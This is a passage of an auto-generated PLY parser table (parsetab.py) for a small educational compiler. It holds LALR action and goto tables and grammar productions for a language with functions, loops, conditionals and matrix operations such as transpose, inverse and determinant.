117,118,119,120,142,144,145,146,147,148,150,153,154,155,156,157,158,170,176,178,188,190,195,198,199,201,203,209,215,218,224,225,226,227,228,240,241,251,257,262,263,264,273,276,277,278,279,291,292,293,305,306,307,308,315,316,317,],[29,42,73,-58,-59,-56,-149,-157,-139,-158,-140,-151,-151,-151,-150,159,-126,-146,-60,-151,-121,-150,192,193,-135,-141,-155,-156,-154,203,-153,-150,-60,229,-57,-122,-136,-148,-147,-142,-145,-134,254,-109,-89,-95,-97,-96,265,-123,-125,-127,-98,291,-96,-93,-124,-137,-138,-144,-143,-87,-91,-60,-100,-86,-60,-94,-99,-92,321,]),'SEMICOLON':([33,34,59,65,71,76,93,94,106,107,108,110,112,113,114,115,117,119,120,121,122,125,128,135,143,149,150,153,154,155,156,158,169,172,175,180,181,189,192,193,194,195,198,199,201,203,209,216,218,219,220,221,222,230,242,243,251,252,253,254,257,258,259,260,276,277,278,279,285,286,288,291,296,305,306,313,314,315,320,325,],[39,-9,89,-85,-10,89,132,-11,-149,-157,-139,-158,-140,-151,-151,-151,-150,-126,-146,167,-28,-83,-84,-54,-110,-110,-135,-141,-155,-156,-154,-153,-22,217,223,-12,231,238,-120,-120,244,-136,-148,-147,-142,-145,-134,255,-109,-150,-110,-110,261,-13,274,275,-127,-29,-23,-120,-98,-153,289,290,-137,-138,-144,-143,-24,304,-106,-87,-14,-100,-86,-30,-25,-99,-26,-27,]),'LOWERTHAN':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,163,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'LOWEREQUAL':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,165,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'TO':([265,],[294,]),'COLON':([3,],[4,]),'CTE_I':([40,78,80,82,95,103,104,105,109,111,116,124,126,127,131,133,151,152,160,161,162,163,164,165,166,168,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,239,245,246,247,248,256,284,291,293,307,309,],[70,-152,-152,115,115,115,115,115,-152,-152,115,-152,115,-152,115,179,115,115,-152,-152,-152,-152,115,-152,-152,213,115,115,115,115,115,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,115,115,115,115,115,115,302,115,115,115,115,]),'CTE_F':([78,80,82,95,103,104,105,109,111,116,124,126,127,131,151,152,160,161,162,163,164,165,166,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,239,245,246,247,248,256,291,293,307,309,],[-152,-152,113,113,113,113,113,-152,-152,113,-152,113,-152,113,113,113,-152,-152,-152,-152,113,-152,-152,113,113,113,113,113,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,113,113,113,113,113,113,113,113,113,113,]),'PLUS':([78,80,82,95,103,104,105,106,107,108,110,112,113,114,115,116,117,120,124,126,127,131,144,146,150,153,154,155,156,158,160,161,162,163,164,165,166,171,174,176,177,190,191,196,197,198,199,200,201,202,203,205,206,207,208,210,211,218,219,226,239,245,246,247,248,256,257,258,278,279,291,293,305,307,309,315,],[-152,-152,111,111,111,111,111,-149,-157,-139,-158,-140,-151,-151,-151,111,-150,-146,-152,111,-152,111,-151,-150,196,-141,-155,-156,-154,-153,-152,-152,-152,-152,111,-152,-152,111,111,111,111,-156,111,-152,-152,-148,-147,-152,-142,-152,-145,-133,-130,-131,-128,-132,-129,-109,-150,-150,111,111,111,111,111,111,-98,-153,-144,-143,111,111,-100,111,111,-99,]),'$end':([1,8,18,20,21,30,31,32,38,88,92,102,],[0,-5,-5,-4,-5,-3,-5,-2,-1,-17,-15,-16,]),'FUNCTION':([4,7,26,39,69,137,183,184,186,232,234,236,237,268,270,272,298,],[5,5,-6,-7,-8,-55,5,-55,-55,-55,5,5,-55,5,-55,5,5,]),'DIFFERENT':([106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-149,-157,-139,-158,-140,-151,-151,-151,-150,161,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'RBRACE':([50,52,53,54,58,59,61,62,64,66,67,68,72,77,81,89,97,98,99,100,106,107,108,110,112,113,114,115,117,119,120,132,136,138,140,141,150,153,154,155,156,158,182,185,187,195,198,199,201,203,209,217,218,223,231,235,238,244,249,250,251,255,257,261,274,275,276,277,278,279,280,281,282,289,290,291,300,304,305,306,310,312,315,318,319,322,327,328,],[-63,-77,-79,-71,-74,88,-70,-80,92,-73,-75,-72,-60,102,-64,-76,137,-53,-60,-60,-149,-157,-139,-158,-140,-151,-151,-151,-150,-126,-146,-78,-60,184,186,-60,-135,-141,-155,-156,-154,-153,232,-60,237,-136,-148,-147,-142,-145,-134,-82,-109,-81,-52,270,-102,-103,280,-116,-127,-111,-98,-105,-117,-118,-137,-138,-144,-143,-38,300,-112,-101,-104,-87,-39,-119,-100,-86,318,-116,-99,-68,-113,-65,328,-69,]),'DOUBLEEQUAL':([57,75,86,106,107,108,110,112,113,114,115,117,119,120,144,146,150,153,154,155,156,158,190,195,198,199,201,203,218,219,257,258,276,277,278,279,305,315,],[-150,-150,124,-149,-157,-139,-158,-140,-151,-151,-151,-150,162,-146,-151,-150,-135,-141,-155,-156,-154,-153,-156,-136,-148,-147,-142,-145,-109,-150,-98,-153,-137,-138,-144,-143,-100,-99,]),'INVERSA':([57,75,86,],[-150,-150,125,]),'TIMES':([106,107,110,112,113,114,115,117,120,144,146,153,154,155,156,158,190,198,199,203,218,219,226,257,258,305,315,],[-149,-157,-158,-140,-151,-151,-151,-150,-146,-151,-150,202,-155,-156,-154,-153,-156,-148,-147,-145,-109,-150,-150,-98,-153,-100,-99,]),'LPAREN':([6,11,27,28,36,48,51,56,57,60,63,75,78,79,80,82,85,87,91,95,103,104,105,116,124,126,127,129,131,146,160,161,162,163,164,165,166,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,219,239,245,246,247,248,256,291,293,294,307,309,],[17,-18,35,-61,-62,-152,82,-152,-88,90,-66,-88,-152,104,-152,116,123,-90,131,116,116,116,116,116,-152,116,-152,176,116,-88,-152,-152,-152,-152,116,-152,-152,116,116,116,116,116,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,-88,116,116,116,116,116,116,116,116,309,116,116,]),'COMA':([34,74,94,101,106,107,108,110,112,113,114,115,117,119,120,122,144,145,146,150,153,154,155,156,158,169,190,195,198,199,201,203,209,218,226,227,230,251,252,257,263,264,276,277,278,279,285,292,305,313,315,320,],[41,-59,134,142,-149,-157,-139,-158,-140,-151,-151,-151,-150,-126,-146,-28,-151,191,-150,-135,-141,-155,-156,-154,-153,214,239,-136,-148,-147,-142,-145,-134,-109,-97,-96,267,-127,-29,-98,-96,293,-137,-138,-144,-143,303,307,-100,-30,-99,323,]),'INPUT':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[56,56,56,-77,-79,-71,-74,-70,-80,-73,-75,-72,56,-19,-76,56,56,-78,56,-20,-21,-82,-81,-102,-103,56,-116,-111,-105,-117,-118,-38,-112,-101,-104,56,-39,-119,-116,-68,-113,-65,56,-69,]),'ELSE':([250,280,300,],[283,-38,-39,]),'ID':([2,12,13,14,15,16,22,23,24,25,37,41,45,46,50,52,53,54,58,61,62,66,67,68,72,78,80,82,83,84,89,90,95,96,100,103,104,105,109,111,116,123,124,126,127,131,132,134,139,151,152,160,161,162,163,164,165,166,167,171,174,176,177,191,196,197,200,202,205,206,207,208,210,211,212,214,217,223,238,239,244,245,246,247,248,249,250,255,256,261,267,274,275,280,282,289,290,291,293,295,300,303,304,307,309,312,318,319,322,323,326,328,],[3,-34,-37,-35,-36,28,34,-31,-32,-33,57,34,74,75,75,-77,-79,-71,-74,-70,-80,-73,-75,-72,75,-152,-152,117,122,-19,-76,130,117,75,75,117,146,117,-152,-152,117,170,-152,117,-152,117,-78,34,75,117,117,-152,-152,-152,-152,117,-152,-152,-20,117,219,226,117,146,-152,-152,-152,-152,-133,-130,-131,-128,-132,-129,-21,122,-82,-81,-102,146,-103,117,117,117,117,75,-116,-111,117,-105,34,-117,-118,-38,-112,-101,-104,117,226,75,-39,122,-119,226,117,-116,-68,-113,-65,122,75,-69,]),'IF':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[51,51,51,-77,-79,-71,-74,-70,-80,-73,-75,-72,51,-19,-76,51,51,-78,51,-20,-21,-82,-81,-102,-103,51,-116,-111,-105,-117,-118,-38,-112,-101,-104,51,-39,-119,-116,-68,-113,-65,51,-69,]),'LBRACE':([29,42,73,159,204,229,266,283,301,324,],[37,72,100,-114,249,-67,295,-115,249,326,]),'FROM':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[60,60,60,-77,-79,-71,-74,-70,-80,-73,-75,-72,60,-19,-76,60,60,-78,60,-20,-21,-82,-81,-102,-103,60,-116,-111,-105,-117,-118,-38,-112,-101,-104,60,-39,-119,-116,-68,-113,-65,60,-69,]),'INT':([5,10,35,39,55,142,167,],[12,23,23,23,23,23,23,]),'FLOAT':([5,10,35,39,55,142,167,],[14,24,24,24,24,24,24,]),'BREAK':([37,46,50,52,53,54,58,61,62,66,67,68,72,84,89,96,100,132,139,167,212,217,223,238,244,249,250,255,261,274,275,280,282,289,290,295,300,304,312,318,319,322,326,328,],[65,65,65,-77,-79,-71,-74,-70,-80,-73,-75,-72,65,-19,-76,65,65,-78,65,-20,-21,-82,-81,-102,-103,65,-116,-111,-105,-117,-118,-38,-112,-101,-104,65,-39,-119,-116,-68,-113,-65,65,-69,]),'TRANSPUESTA':([57,75,86,],[-150,-150,128,]),'MAIN':([4,7,9,19,26,39,69,137,183,184,186,232,233,234,236,237,268,269,270,271,272,297,298,299,311,],[11,11,11,11,-6,-7,-8,-55,-40,-55,-55,-55,-42,-44,-46,-55,-41,-45,-55,-50,-47,-43,-49,-48,-51,]),}
_lr_action = {}
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = {}
_lr_action[_x][_k] = _y
del _lr_action_items
_lr_goto_items = {'creaTrans':([128,],[175,]),'creaCuadReturn':([135,],[181,]),'quad_fact':([112,],[153,]),'creaInversa':([125,],[172,]),'vars':([37,72,100,],[46,96,139,]),'condFinal':([250,312,],[282,319,]),'paramFuncion':([176,293,307,],[224,308,316,]),'push_function':([28,],[36,]),'push_arreglo':([252,],[285,]),'endProc':([137,184,186,232,237,270,],[183,234,236,268,272,298,]),'var_cte':([82,95,103,104,105,116,126,131,151,152,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[106,106,106,106,106,106,106,106,198,199,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,]),'while3':([318,],[322,]),'arreglo':([37,46,50,72,82,95,96,100,103,104,105,116,126,131,139,151,152,164,171,174,176,177,191,239,245,246,247,248,249,256,291,293,295,307,309,326,],[47,47,47,47,107,107,47,47,107,107,107,107,107,107,47,107,107,107,107,107,107,107,107,107,107,107,107,107,47,107,107,107,47,107,107,47,]),'nomMain':([4,7,9,19,],[6,6,6,6,]),'cond':([159,],[204,]),'termino':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[108,108,108,108,108,108,108,108,108,108,108,108,108,108,108,108,108,278,279,108,108,108,108,108,]),'create_asign':([143,149,220,221,],[189,194,259,260,]),'tipoFunc':([5,],[16,]),'bloque':([204,301,],[250,312,]),'push_id':([57,75,117,146,170,219,226,],[86,86,158,158,215,258,158,]),'quad_print':([192,193,254,],[242,243,286,]),'varsGlobal':([4,],[7,]),'matrix':([37,46,50,72,82,95,96,100,103,104,105,116,126,131,139,151,152,164,171,174,176,177,191,239,245,246,247,248,249,256,291,293,295,307,309,326,],[49,49,49,49,110,110,49,49,110,110,110,110,110,110,49,110,110,110,110,110,110,110,110,110,110,110,110,110,49,110,110,110,49,110,110,49,]),'tipo':([10,35,39,55,142,167,],[22,45,22,83,45,83,]),'inversa':([37,46,50,72,96,100,139,249,295,326,],[62,62,62,62,62,62,62,62,62,62,]),'exp1':([150,],[195,]),'estatuto':([37,46,50,72,96,100,139,249,295,326,],[50,50,50,50,50,50,50,50,50,50,]),'determinante':([174,],[222,]),'param':([35,142,],[43,188,]),'varAux2':([83,214,303,323,],[121,253,314,325,]),'varAuxGlobal2':([22,41,134,267,],[33,71,180,296,]),'varAuxGlobal1':([10,39,],[26,69,]),'program':([0,],[1,]),'functionReturn':([72,99,100,136,141,185,],[97,138,140,182,187,235,]),'varAux1':([55,167,],[84,212,]),'paramAvarTable':([74,],[101,]),'main':([4,7,9,19,],[8,18,21,31,]),'lectura':([37,46,50,72,96,100,139,249,295,326,],[52,52,52,52,52,52,52,52,52,52,]),'empty':([35,72,99,100,136,141,142,176,185,293,307,],[44,98,98,98,98,98,44,225,98,225,225,]),'function':([4,7,183,234,236,268,272,298,],[9,19,233,269,271,297,299,311,]),'escrituraAux':([104,191,239,],[147,240,273,]),'push_poper':([48,56,78,80,109,111,124,127,160,161,162,163,165,166,196,197,200,202,],[79,85,103,105,151,152,171,174,205,206,207,208,210,211,245,246,247,248,]),'push_var':([122,],[169,]),'gosub':([224,],[262,]),'ver_dim2':([305,],[315,]),'comp':([119,],[164,]),'factor':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,112,]),'actualizaFuncion':([57,75,146,219,],[87,87,87,87,]),'transpuesta':([37,46,50,72,96,100,139,249,295,326,],[53,53,53,53,53,53,53,53,53,53,]),'condElse':([283,],[301,]),'condicion':([37,46,50,72,96,100,139,249,295,326,],[54,54,54,54,54,54,54,54,54,54,]),'quad_term':([108,],[150,]),'push_cte':([113,114,115,144,],[154,155,156,190,]),'quad_comp':([209,],[251,]),'generarEra':([87,],[129,]),'loopFromDo':([37,46,50,72,96,100,139,249,295,326,],[58,58,58,58,58,58,58,58,58,58,]),'expresion':([82,104,116,131,171,174,177,191,239,291,309,],[118,145,157,178,216,220,228,145,145,306,317,]),'endPrograma':([8,18,21,31,],[20,30,32,38,]),'llamadaAFuncion':([37,46,50,72,96,100,104,139,174,191,239,249,295,326,],[59,76,76,76,76,76,148,76,221,241,241,76,76,76,]),'push_matriz':([313,],[320,]),'asignacion':([37,46,50,72,96,100,139,249,295,326,],[61,61,61,61,61,61,61,61,61,61,]),'while2':([229,],[266,]),'generaCuadbreak':([65,],[93,]),'while1':([63,],[91,]),'push_id2':([226,],[263,]),'bloqueAux':([37,46,50,72,96,100,139,249,295,326,],[64,77,81,99,136,141,185,281,310,327,]),'ver_dim1':([218,],[257,]),'while':([37,46,50,72,96,100,139,249,295,326,],[66,66,66,66,66,66,66,66,66,66,]),'termino1':([153,],[201,]),'exp':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,256,291,293,307,309,],[119,135,143,119,149,119,173,119,209,119,119,227,119,119,119,276,277,287,119,227,227,119,]),'nomFunc':([16,],[27,]),'factorAux':([82,95,103,104,105,116,126,131,164,171,174,176,177,191,239,245,246,247,248,256,291,293,307,309,],[120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,120,]),'comparacion':([37,46,50,72,96,100,139,249,295,326,],[67,67,67,67,67,67,67,67,67,67,]),'paramFuncionAux':([227,263,],[264,292,]),'escritura':([37,46,50,72,96,100,139,249,295,326,],[68,68,68,68,68,68,68,68,68,68,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
for _x, _y in zip(_v[0], _v[1]):
if not _x in _lr_goto: _lr_goto[_x] = {}
_lr_goto[_x][_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> program","S'",1,None,None,None),
('program -> PROGRAM ID COLON varsGlobal function main endPrograma','program',7,'p_program','lexAndSyn.py',144),
('program -> PROGRAM ID COLON function main endPrograma','program',6,'p_program','lexAndSyn.py',145),
('program -> PROGRAM ID COLON varsGlobal main endPrograma','program',6,'p_program','lexAndSyn.py',146),
('program -> PROGRAM ID COLON main endPrograma','program',5,'p_program','lexAndSyn.py',147),
('endPrograma -> <empty>','endPrograma',0,'p_endPrograma','lexAndSyn.py',153),
('varsGlobal -> VAR varAuxGlobal1','varsGlobal',2,'p_varsGlobal','lexAndSyn.py',158),
('varAuxGlobal1 -> tipo varAuxGlobal2 SEMICOLON','varAuxGlobal1',3,'p_varAuxGlobal1','lexAndSyn.py',162),
('varAuxGlobal1 -> tipo varAuxGlobal2 SEMICOLON varAuxGlobal1','varAuxGlobal1',4,'p_varAuxGlobal1','lexAndSyn.py',163),
('varAuxGlobal2 -> ID','varAuxGlobal2',1,'p_varAuxGlobal2','lexAndSyn.py',167),
('varAuxGlobal2 -> ID COMA varAuxGlobal2','varAuxGlobal2',3,'p_varAuxGlobal2','lexAndSyn.py',168),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH','varAuxGlobal2',4,'p_varAuxGlobal2','lexAndSyn.py',169),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH COMA varAuxGlobal2','varAuxGlobal2',6,'p_varAuxGlobal2','lexAndSyn.py',170),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH','varAuxGlobal2',7,'p_varAuxGlobal2','lexAndSyn.py',171),
('varAuxGlobal2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH COMA varAuxGlobal2','varAuxGlobal2',9,'p_varAuxGlobal2','lexAndSyn.py',172),
('main -> nomMain LPAREN RPAREN LBRACE bloqueAux RBRACE','main',6,'p_main','lexAndSyn.py',180),
('main -> nomMain LPAREN RPAREN LBRACE vars bloqueAux RBRACE','main',7,'p_main','lexAndSyn.py',181),
('main -> nomMain LPAREN RPAREN LBRACE llamadaAFuncion RBRACE','main',6,'p_main','lexAndSyn.py',182),
('nomMain -> MAIN','nomMain',1,'p_nomMain','lexAndSyn.py',186),
('vars -> VAR varAux1','vars',2,'p_vars','lexAndSyn.py',196),
('varAux1 -> tipo varAux2 SEMICOLON','varAux1',3,'p_varAux1','lexAndSyn.py',200),
('varAux1 -> tipo varAux2 SEMICOLON varAux1','varAux1',4,'p_varAux1','lexAndSyn.py',201),
('varAux2 -> ID push_var','varAux2',2,'p_varAux2','lexAndSyn.py',205),
('varAux2 -> ID push_var COMA varAux2','varAux2',4,'p_varAux2','lexAndSyn.py',206),
('varAux2 -> ID LCORCH CTE_I RCORCH push_arreglo','varAux2',5,'p_varAux2','lexAndSyn.py',207),
('varAux2 -> ID LCORCH CTE_I RCORCH push_arreglo COMA varAux2','varAux2',7,'p_varAux2','lexAndSyn.py',208),
('varAux2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz','varAux2',8,'p_varAux2','lexAndSyn.py',209),
('varAux2 -> ID LCORCH CTE_I RCORCH LCORCH CTE_I RCORCH push_matriz COMA varAux2','varAux2',10,'p_varAux2','lexAndSyn.py',210),
('push_var -> <empty>','push_var',0,'p_pushVariable','lexAndSyn.py',214),
('push_arreglo -> <empty>','push_arreglo',0,'p_arreglo','lexAndSyn.py',220),
('push_matriz -> <empty>','push_matriz',0,'p_matriz','lexAndSyn.py',231),
('tipo -> INT','tipo',1,'p_tipo','lexAndSyn.py',246),
('tipo -> FLOAT','tipo',1,'p_tipo','lexAndSyn.py',247),
('tipo -> CHAR','tipo',1,'p_tipo','lexAndSyn.py',248),
('tipoFunc -> INT','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',253),
('tipoFunc -> FLOAT','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',254),
('tipoFunc -> CHAR','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',255),
('tipoFunc -> VOID','tipoFunc',1,'p_tipoFunc','lexAndSyn.py',256),
('bloque -> LBRACE RBRACE','bloque',2,'p_bloque','lexAndSyn.py',261),
('bloque -> LBRACE bloqueAux RBRACE','bloque',3,'p_bloque','lexAndSyn.py',262),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc','function',9,'p_function','lexAndSyn.py',268),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc','function',11,'p_function','lexAndSyn.py',269),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE functionReturn RBRACE endProc function','function',10,'p_function','lexAndSyn.py',270),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc function','function',12,'p_function','lexAndSyn.py',271),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc','function',10,'p_function','lexAndSyn.py',272),
('function -> FUNCTION tipoFunc nomFunc LPAREN RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function','function',11,'p_function','lexAndSyn.py',273),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc','function',10,'p_function','lexAndSyn.py',274),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc','function',11,'p_function','lexAndSyn.py',275),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE bloqueAux functionReturn RBRACE endProc function','function',12,'p_function','lexAndSyn.py',276),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc','function',12,'p_function','lexAndSyn.py',277),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE functionReturn RBRACE endProc function','function',11,'p_function','lexAndSyn.py',278),
('function -> FUNCTION tipoFunc nomFunc LPAREN param RPAREN LBRACE vars bloqueAux functionReturn RBRACE endProc function','function',13,'p_function','lexAndSyn.py',279),
('functionReturn -> RETURN exp creaCuadReturn SEMICOLON','functionReturn',4,'p_functionReturn','lexAndSyn.py',283),
('functionReturn -> empty','functionReturn',1,'p_functionReturn','lexAndSyn.py',284),
('creaCuadReturn -> <empty>','creaCuadReturn',0,'p_creaCuadReturn','lexAndSyn.py',288),
('endProc -> <empty>','endProc',0,'p_endProc','lexAndSyn.py',293),
('param -> tipo ID paramAvarTable','param',3,'p_param','lexAndSyn.py',298),
('param -> tipo ID paramAvarTable COMA param','param',5,'p_param','lexAndSyn.py',299),
('param -> empty','param',1,'p_param','lexAndSyn.py',300),
('paramAvarTable -> <empty>','paramAvarTable',0,'p_paramAvarTable','lexAndSyn.py',305),
('empty -> <empty>','empty',0,'p_empty','lexAndSyn.py',311),
('push_function -> <empty>','push_function',0,'p_push_function','lexAndSyn.py',315),
('nomFunc -> ID push_function','nomFunc',2,'p_nomFunc','lexAndSyn.py',324),
('bloqueAux -> estatuto','bloqueAux',1,'p_bloqueAux','lexAndSyn.py',333),
('bloqueAux -> estatuto bloqueAux','bloqueAux',2,'p_bloqueAux','lexAndSyn.py',334),
('while -> WHILE while1 LPAREN expresion RPAREN while2 LBRACE bloqueAux RBRACE while3','while',10,'p_while','lexAndSyn.py',338),
('while1 -> <empty>','while1',0,'p_while1','lexAndSyn.py',342),
('while2 -> <empty>','while2',0,'p_while2','lexAndSyn.py',346),
('while3 -> <empty>','while3',0,'p_while3','lexAndSyn.py',350),
('loopFromDo -> FROM LPAREN ID EQUAL expresion RPAREN TO LPAREN expresion RPAREN DO LBRACE bloqueAux RBRACE','loopFromDo',14,'p_loopFromDo','lexAndSyn.py',354),
('estatuto -> asignacion','estatuto',1,'p_estatuto','lexAndSyn.py',366),
('estatuto -> condicion','estatuto',1,'p_estatuto','lexAndSyn.py',367),
('estatuto -> escritura','estatuto',1,'p_estatuto','lexAndSyn.py',368),
('estatuto -> while','estatuto',1,'p_estatuto','lexAndSyn.py',369),
('estatuto -> loopFromDo','estatuto',1,'p_estatuto','lexAndSyn.py',370),
('estatuto -> comparacion','estatuto',1,'p_estatuto','lexAndSyn.py',371),
('estatuto -> llamadaAFuncion SEMICOLON','estatuto',2,'p_estatuto','lexAndSyn.py',372),
('estatuto -> lectura','estatuto',1,'p_estatuto','lexAndSyn.py',373),
('estatuto -> BREAK generaCuadbreak SEMICOLON','estatuto',3,'p_estatuto','lexAndSyn.py',374),
('estatuto -> transpuesta','estatuto',1,'p_estatuto','lexAndSyn.py',375),
('estatuto -> inversa','estatuto',1,'p_estatuto','lexAndSyn.py',376),
('transpuesta -> ID push_id TRANSPUESTA creaTrans SEMICOLON','transpuesta',5,'p_transpuesta','lexAndSyn.py',380),
('inversa -> ID push_id INVERSA creaInversa SEMICOLON','inversa',5,'p_inversa','lexAndSyn.py',383),
('creaInversa -> <empty>','creaInversa',0,'p_creaInversa','lexAndSyn.py',387),
('creaTrans -> <empty>','creaTrans',0,'p_creaTrans','lexAndSyn.py',391),
('generaCuadbreak -> <empty>','generaCuadbreak',0,'p_generaCuadbreak','lexAndSyn.py',395),
('llamadaAFuncion -> ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN expresion','llamadaAFuncion',8,'p_llamadaAFuncion','lexAndSyn.py',399),
('llamadaAFuncion -> ID actualizaFuncion generarEra LPAREN paramFuncion gosub RPAREN','llamadaAFuncion',7,'p_llamadaAFuncion','lexAndSyn.py',400),
('actualizaFuncion -> <empty>','actualizaFuncion',0,'p_actualizaFuncion','lexAndSyn.py',404),
('gosub -> <empty>','gosub',0,'p_gosub','lexAndSyn.py',409),
('generarEra -> <empty>','generarEra',0,'p_generarEra','lexAndSyn.py',421),
('paramFuncion -> ID push_id2 paramFuncionAux','paramFuncion',3,'p_paramFuncion','lexAndSyn.py',429),
('paramFuncion -> ID push_id2 paramFuncionAux COMA paramFuncion','paramFuncion',5,'p_paramFuncion','lexAndSyn.py',430),
('paramFuncion -> exp paramFuncionAux','paramFuncion',2,'p_paramFuncion','lexAndSyn.py',431),
('paramFuncion -> exp paramFuncionAux COMA paramFuncion','paramFuncion',4,'p_paramFuncion','lexAndSyn.py',432),
('paramFuncion -> empty','paramFuncion',1,'p_paramFuncion','lexAndSyn.py',433),
('paramFuncionAux -> <empty>','paramFuncionAux',0,'p_paramFuncionAux','lexAndSyn.py',437),
('push_id2 -> <empty>','push_id2',0,'p_push_id2','lexAndSyn.py',441),
('arreglo -> ID push_id LCORCH exp RCORCH ver_dim1','arreglo',6,'p_array','lexAndSyn.py',445),
('matrix -> ID push_id LCORCH exp RCORCH LCORCH exp RCORCH ver_dim2','matrix',9,'p_matrix','lexAndSyn.py',449),
('ver_dim2 -> <empty>','ver_dim2',0,'p_ver_dim2','lexAndSyn.py',453),
('asignacion -> ID push_id EQUAL push_poper expresion create_asign SEMICOLON','asignacion',7,'p_asignacion','lexAndSyn.py',457),
('asignacion -> arreglo EQUAL push_poper exp create_asign SEMICOLON','asignacion',6,'p_asignacion','lexAndSyn.py',458),
('asignacion -> matrix EQUAL push_poper exp create_asign SEMICOLON','asignacion',6,'p_asignacion','lexAndSyn.py',459),
('asignacion -> ID push_id EQUAL push_poper llamadaAFuncion create_asign SEMICOLON','asignacion',7,'p_asignacion','lexAndSyn.py',460),
('asignacion -> ID push_id EQUAL push_poper determinante SEMICOLON','asignacion',6,'p_asignacion','lexAndSyn.py',461),
('determinante -> ID push_id DETERMINANT','determinante',3,'p_determinante','lexAndSyn.py',465),
('push_id_dimensionada -> <empty>','push_id_dimensionada',0,'p_push_id_dimensionada','lexAndSyn.py',470),
('create_asign_dim -> <empty>','create_asign_dim',0,'p_create_asign_dim','lexAndSyn.py',473),
('ver_dim1 -> <empty>','ver_dim1',0,'p_ver_dim1','lexAndSyn.py',477),
('create_asign -> <empty>','create_asign',0,'p_create_asign','lexAndSyn.py',481),
('comparacion -> ID push_id DOUBLEEQUAL push_poper expresion SEMICOLON','comparacion',6,'p_comparacion','lexAndSyn.py',485),
('condicion -> IF LPAREN expresion RPAREN cond bloque condFinal','condicion',7,'p_condicion','lexAndSyn.py',489),
('condicion -> IF LPAREN expresion RPAREN cond bloque ELSE condElse bloque condFinal','condicion',10,'p_condicion','lexAndSyn.py',490),
('cond -> <empty>','cond',0,'p_quad_cond','lexAndSyn.py',494),
('condElse -> <empty>','condElse',0,'p_quad_condElse','lexAndSyn.py',498),
('condFinal -> <empty>','condFinal',0,'p_quad_condFinal','lexAndSyn.py',502),
('escritura -> PRINT push_poper LPAREN escrituraAux RPAREN quad_print SEMICOLON','escritura',7,'p_escritura','lexAndSyn.py',506),
('escritura -> PRINT push_poper LPAREN llamadaAFuncion RPAREN quad_print SEMICOLON','escritura',7,'p_escritura','lexAndSyn.py',507),
('lectura -> INPUT push_poper LPAREN ID push_id RPAREN quad_print SEMICOLON','lectura',8,'p_lectura','lexAndSyn.py',511),
('quad_print -> <empty>','quad_print',0,'p_quad_print','lexAndSyn.py',515),
('escrituraAux -> expresion','escrituraAux',1,'p_escrituraAux','lexAndSyn.py',519),
